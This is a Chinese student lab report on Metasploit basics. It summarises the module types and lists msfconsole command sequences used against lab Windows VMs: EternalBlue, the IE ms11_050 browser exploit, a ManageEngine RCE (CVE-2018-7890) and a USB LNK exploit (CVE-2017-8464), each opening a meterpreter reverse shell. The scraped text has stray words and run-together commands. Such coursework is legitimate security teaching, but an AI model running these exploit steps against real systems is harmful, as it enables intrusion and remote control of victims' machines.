20164305 徐广皓 Exp5 MSF基础应用

  • 1、知识点总结
  • 2、攻击实例
    • 主动攻击的实践
      • ms08_067(win7)
        • payload/generic/shell_reverse_tcp(失败)
        • payload/windows/meterpreter/reverse_tcp(失败)
      • ms17_010_eternalblue(win7)
        • payload/windows/x64/meterpreter/reverse_tcp(成功)
    • 攻击浏览器的实践
        • ms11_050(win7)(成功)
      ms14_064(win7)  
        • exploit/windows/browser/ms14_064_ole_code_execution (失败)
    • 攻击客户端的实践
      • ManageEngine Applications Manager 13.5远程代码执行漏洞 (CVE-2018-7890)
        • manageengine_appmanager_exec (成功且惟一)
    • 成功应用任何一个辅助模块
      • usb fileforma (成功)
  • 3、实验总结
1、知识点总结

1.MSF攻击方法

  • 主动攻击:扫描主机漏洞,进行攻击
  • 攻击浏览器
  • 攻击其余客户端

2.MSF的六种模块

  • 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去

    • 主动渗透攻击:攻击某个系统服务
    • 被动渗透攻击:攻击某个客户端应用
  • 辅助模块Auxiliary Modules:在进行渗透攻击以前获得目标系统丰富的情报信息,它是攻击的前提攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击以后去执行的代码

    • 网络服务的扫描与查点
    • 探查敏感信息泄露、Fuzz测试发掘漏洞
    • 收集登陆密码
  • 空字段模块Nop Modules

    • 一些对程序运行状态不会形成任何实质影响的空操做或无关操做指令,即空指令(滑行区)
    • 因为系统没法精确计算shellcode的起始地址,因此加入nops以增长攻击成功的几率
  • 编码模块Encoders后渗透攻击模块Post:攻击成功以后,动态传输代码使其在被控机执行

    • 改变payload形状,使得不出现特定字符
    • 确保攻击载荷中不会出现渗透攻击过程当中应加以免的“坏字符”
  • 查看六种模块源码目录/usr/share/metasploit-framework/modules

3.MSF的三种用户操做界面

 

  • msfconsole

    • 查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]
    • 查看设置信息show [options]
    • 查看攻击目标类型show [target]
    • 查找命令search
      • 查找2016年产生的在windows平台下的漏洞search ms16 type:exploit platform:windows
  • armitagewebgui

    • 启动服务器service postgresql start

    • 启动armitagearmitage

2、攻击实例

没实现ms08_067

靶机:Microsoft Windows 7

payload : generic/shell_reverse_tcp

实验步骤

经过菜单栏图标直接打开Armitag
html

根据已知信息推导出目标主机所在网段的IP,扫描目标网段完整信息,确认目标网络拓扑结构以实施网络侦查。依次选择Hosts->Nmap Scan->Quick Scan(OS detect)web

 

虚拟机所在网段位192.168.80.0/24sql

 

Win10虚拟机IP信息shell

 

扫描后获得网段中4个虚拟机包括主机windows

 

选中靶机192.168.80.137,右键选择Services,查看靶机上开启的服务:api

 

选中靶机192.168.80.137,右键选择ScanArmitage会调用Metasploit的漏洞扫描模块,定向扫描靶机,寻找存在的漏洞,为下一步肯定攻击方法提供参考依据浏览器

 

可见相似前几回实验在Metasploit中手动配置主机号、端口号等设置如今通通直接自动化了!服务器

利用上一步中漏洞扫描获得的漏洞信息,自动搜索Metasploit攻击模块库,寻找合适的攻击模块。选中靶机192.168.80.137,依次选择菜单栏Attacks->Find AttacksArmitage会开始自动搜索寻找合适的攻击模块:网络

 

在利用Armitage完成对靶机的攻击模块自动化搜索之后,选中192.168.80.137机右键能够发现多了Attack菜单。依次选择Attack->smb->ms08_067_netapi菜单,选择smb漏洞下的ms08_067漏洞对WIN7靶机进行攻击(也能够在Armitage左侧树型目录下依次选择exploit->windows->smb->ms08_067_netapi找到该漏洞):app

 

launch一下,不行!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

为啥???而后我去看了一下适用系统,没有win7我哭了,我以前在作啥子?

 

 实现MS17_010_eternalblue

靶机:Microsoft Windows 7

payload :windows/meterpreter/reverse_tcp

实验步骤

 依然铁头娃,此次手动配置(确定是能成功的)

 1 use auxiliary/scanner/smb/smb_ms17_010  2 set RHOST 192.168.80.141
 3 Run  4 Back  5 search ms17_010  6 use exploit/windows/smb/ms17_010_eternalblue  7 set RHOST 192.168.80.141
 8 show options  9 set payload windows/meterpreter/reverse_tcp 10 set LHOST 192.168.80.130
11 run

实现ms11_050

靶机:Microsoft Windows 7 + IE8

payload : windows/meterpreter/reverse_tcp

实验步骤

1 search ms11_050 2 use exploit/windows/browser/ms11_050_mshtml_cobjectelement 3 set srvhost 192.168.80.130
4 set payload windows/meterpreter/reverse_tcp 5 set LHOST 192.168.80.130
6 show targets 7 set target 4
8 Run 9 http://192.168.80.130:8080/zrCOkaFC

实现CVE-2018-7890

靶机:Windows 10

实现这一攻击须要ManageEngine Applications Manager 13.5,网上有相关警报书

网络上通用版本为13.5(试用版30天),实际上不怎么好用。。。只须要启动验证服务,但也不是每次都能成功地 (我也试了半天才成功,成功以后电脑蓝屏我还没快照 o(╥﹏╥)o)

1 use exploit/windows/http/manageengine_appmanager_exec 2 show options 3 set RHOST 192.168.80.136
4 Set RPORT 6305
5 set LHOST 192.168.80.130
6 set payload windows/meterpreter/reverse_tcp 7 exploit

虽然显示的是13版本,但安装的时候显示的13.5安装.......我也不知道怎么回事可能不显示以后的版本号吧

 

实现CVE-2017-8464

攻击靶机:Win7

1 use exploit/windows/fileformat/cve_2017_8464_lnk_rce 2 set payload windows/meterpreter/reverse_tcp 3 set LHOST 192.168.80.130 4 exploit 5 cp -r /root/.msf4/local/ /media/root/KINGSTON 6 use multi/handler 7 set paylaod windows/meterpreter/reverse_tcp 8 set LHOST 192.168.80.130 9 Exploit

这里要注意系统要开启U盘自动播放,若是没开启双击第一个文件就行

实验感想

作攻击以前,要看看攻击对当前版本是否可行,避免出现铁头娃现象。对于不一样的攻击,可能有一次不行以后就成功的现象,要屡次尝试分析其中的缘由才能进行判断。因为个人实验中基本使用win7和win10,因此大部分早起漏洞都修补了,找新漏洞就有些困难,尤为是win10找了半天才试出来一个,幸亏那个漏洞软件公司没有修补,要再也不找一个惟一还会花很长时间。

相关文章
相关标签/搜索